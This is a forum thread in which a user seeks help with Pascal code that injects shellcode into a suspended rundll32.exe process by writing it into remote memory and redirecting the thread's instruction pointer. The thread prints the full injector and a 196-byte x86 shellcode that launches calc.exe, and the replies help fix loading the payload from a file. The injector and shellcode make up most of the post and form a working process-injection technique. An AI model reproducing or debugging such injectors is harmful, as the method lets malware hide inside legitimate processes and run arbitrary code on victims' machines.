Recent

Author Topic: array of bytes  (Read 5292 times)

fpc2pas

  • New Member
  • *
  • Posts: 34
array of bytes
« on: October 17, 2021, 11:14:02 am »
hey

wondering why can't successsfully execute injected code into a process while if using
const array of byte it works. but when loading the same bytes from file and converted back into array of bytes it doesn't work.

below is my code

Code: Pascal  [Select][+][-]
  1.  
  2. function StrToByte(const Value: String): TByteArr;
  3. var
  4. I: integer;
  5. begin
  6. SetLength(Result, Length(Value));
  7. for I := 0 to Length(Value) - 1 do
  8. begin
  9. Result[I] := ord(Value[I + 1]);
  10. end;
  11. end;
  12.  
  13.  
  14. procedure inject_code(shell_content:string);
  15. var
  16. shell_code : TByteArray;
  17. shell_content : string;
  18.  pi: TProcessInformation;
  19.   si: TStartupInfo;
  20.   ctx: Context;
  21.   remote_shellcodePtr: Pointer;
  22.   Written:cardinal;
  23.   AppToLaunch: string;
  24.  
  25. begin
  26.  
  27.  
  28.  
  29. shell_code :=  StrToByte(shell_content);
  30.  
  31. AppToLaunch := 'rundll32.exe';
  32. UniqueString(AppToLaunch);
  33.  
  34. FillMemory( @si, sizeof( si ), 0 );
  35. FillMemory( @pi, sizeof( pi ), 0 );
  36.  
  37. CreateProcess(nil, PChar(AppToLaunch), nil, nil, False,
  38.               CREATE_SUSPENDED,
  39.               nil, nil,  si, pi );
  40.  
  41.  ctx.ContextFlags := CONTEXT_CONTROL;
  42.  GetThreadContext(pi.hThread,ctx);
  43.  
  44.  remote_shellcodePtr:=VirtualAllocEx(pi.hProcess,Nil,SizeOf(shell_code),MEM_COMMIT,
  45.    PAGE_EXECUTE_READWRITE);
  46.  
  47.  
  48.  WriteProcessMemory(pi.hProcess,remote_shellcodePtr,@shell_code,Sizeof(shell_code),written);
  49.  
  50.  ctx.Eip:=integer(remote_shellcodePtr);
  51.  ctx.ContextFlags := CONTEXT_CONTROL;
  52.  SetThreadContext(pi.hThread,ctx);
  53.  ResumeThread(pi.hThread);
  54.  
  55.  

i have used Tstringlist to load the following file content
and pass it into
inject_code(list.text) something like that
Code: Pascal  [Select][+][-]
  1.  
  2. // here is shell_content loaded as string
  3. $89,$e5,$83,$ec,$20,$31,$db,
  4. $64,$8b,$5b,$30,$8b,$5b,$0c,
  5. $8b,$5b,$1c,$8b,$1b,$8b,$1b,
  6. $8b,$43,$08,$89,$45,$fc,$8b,
  7. $58,$3c,$01,$c3,$8b,$5b,$78,
  8. $01,$c3,$8b,$7b,$20,$01,$c7,
  9. $89,$7d,$f8,$8b,$4b,$24,$01,
  10. $c1,$89,$4d,$f4,$8b,$53,$1c,
  11. $01,$c2,$89,$55,$f0,$8b,$53,
  12. $14,$89,$55,$ec,$eb,$32,$31,
  13. $c0,$8b,$55,$ec,$8b,$7d,$f8,
  14. $8b,$75,$18,$31,$c9,$fc,$8b,
  15. $3c,$87,$03,$7d,$fc,$66,$83,
  16. $c1,$08,$f3,$a6,$74,$05,$40,
  17. $39,$d0,$72,$e4,$8b,$4d,$f4,
  18. $8b,$55,$f0,$66,$8b,$04,$41,
  19. $8b,$04,$82,$03,$45,$fc,$c3,
  20. $ba,$78,$78,$65,$63,$c1,$ea,
  21. $08,$52,$68,$57,$69,$6e,$45,
  22. $89,$65,$18,$e8,$b8,$ff,$ff,$ff,
  23. $31,$c9,$51,$68,$2e,$65,$78,
  24. $65,$68,$63,$61,$6c,$63,$89,
  25. $e3,$41,$51,$53,$ff,$d0,$31,
  26. $c9,$b9,$01,$65,$73,$73,$c1,
  27. $e9,$08,$51,$68,$50,$72,$6f,
  28. $63,$68,$45,$78,$69,$74,$89,
  29. $65,$18,$e8,$87,$ff,$ff,$ff,$31,
  30. $d2,$52,$ff,$d0
  31.  

so the execution is okay but the code executing is not working while if i declare the same content as below it works
Code: Pascal  [Select][+][-]
  1. shell_code:array[0..195] of BYTE = (
  2.   $89,$e5,$83,$ec,$20,$31,$db,$64,$8b,$5b,$30,$8b,
  3.   $5b,$0c,$8b,$5b,$1c,$8b,$1b,$8b,$1b,$8b,$43,$08,
  4.   $89,$45,$fc,$8b,$58,$3c,$01,$c3,$8b,$5b,$78,$01,
  5.   $c3,$8b,$7b,$20,$01,$c7,$89,$7d,$f8,$8b,$4b,$24,
  6.   $01,$c1,$89,$4d,$f4,$8b,$53,$1c,$01,$c2,$89,$55,
  7.   $f0,$8b,$53,$14,$89,$55,$ec,$eb,$32,$31,$c0,$8b,
  8.   $55,$ec,$8b,$7d,$f8,$8b,$75,$18,$31,$c9,$fc,$8b,
  9.   $3c,$87,$03,$7d,$fc,$66,$83,$c1,$08,$f3,$a6,$74,
  10.   $05,$40,$39,$d0,$72,$e4,$8b,$4d,$f4,$8b,$55,$f0,
  11.   $66,$8b,$04,$41,$8b,$04,$82,$03,$45,$fc,$c3,$ba,
  12.   $78,$78,$65,$63,$c1,$ea,$08,$52,$68,$57,$69,$6e,
  13.   $45,$89,$65,$18,$e8,$b8,$ff,$ff,$ff,$31,$c9,$51,
  14.   $68,$2e,$65,$78,$65,$68,$63,$61,$6c,$63,$89,$e3,
  15.   $41,$51,$53,$ff,$d0,$31,$c9,$b9,$01,$65,$73,$73,
  16.   $c1,$e9,$08,$51,$68,$50,$72,$6f,$63,$68,$45,$78,
  17.   $69,$74,$89,$65,$18,$e8,$87,$ff,$ff,$ff,$31,$d2,
  18.   $52,$ff,$d0,$00);
  19.  
  20.  

any solution if wanna to import these content from a file or something

dseligo

  • Hero Member
  • *****
  • Posts: 1196
Re: array of bytes
« Reply #1 on: October 17, 2021, 12:46:22 pm »
Code: Pascal  [Select][+][-]
  1. function StrToByte(const Value: String): TByteArr;
  2. var
  3. I: integer;
  4. begin
  5. SetLength(Result, Length(Value));
  6. for I := 0 to Length(Value) - 1 do
  7. begin
  8. Result[I] := ord(Value[I + 1]);
  9. end;
  10. end;

On the first glance, I think this function isn't converting correctly.
You have string with hexadecimal values, separated with commas and in your function you just go one character at a time. You need to take hexadecimal value (3 characters in your example) and skip commas, new lines, spaces...
After that it would be good idea if you compare result from this to array you declared in code, to see if they are same (just to test converting function).
« Last Edit: October 17, 2021, 12:48:31 pm by dseligo »

Thaddy

  • Hero Member
  • *****
  • Posts: 14205
  • Probably until I exterminate Putin.
Re: array of bytes
« Reply #2 on: October 17, 2021, 01:04:31 pm »
You should not convert at all. When from code define an array of byte, when saving, use a file of byte, not an array of string or char. Yes, you can save and read from binary files in Pascal...
Anyway code injection is really old school and may get you into more problems when the written code is not relocatable written. if at all accepted by the OS.
« Last Edit: October 17, 2021, 01:13:10 pm by Thaddy »
Specialize a type, not a var.

fpc2pas

  • New Member
  • *
  • Posts: 34
Re: array of bytes
« Reply #3 on: October 18, 2021, 05:57:27 am »
sorry but both solution you provide is not working.

dseligo

  • Hero Member
  • *****
  • Posts: 1196
Re: array of bytes
« Reply #4 on: October 18, 2021, 09:32:46 am »
sorry but both solution you provide is not working.

Did you correct conversion function?
Did you compared result against the array you declare in code?

fpc2pas

  • New Member
  • *
  • Posts: 34
Re: array of bytes
« Reply #5 on: October 18, 2021, 11:33:28 am »
i did correct conversion and did comparing and it is same i have used the following to compay array results

Code: Pascal  [Select][+][-]
  1. SetString(str, PAnsiChar(@shell_code[0]), length(shell_code)); // import shellcode
  2. SetString(str1, PAnsiChar(@shellcode1[0]), length(shellcode1)); // shellcode in const value
  3.  
  4.  
  5. if ( str = str1 ) then
  6.  
  7. writeln('ok');
  8.  

fpc2pas

  • New Member
  • *
  • Posts: 34
Re: array of bytes
« Reply #6 on: October 18, 2021, 12:07:34 pm »
i think found the problem while there is some space in last part of array. thanks it is solved now  ;)

 

TinyPortal © 2005-2018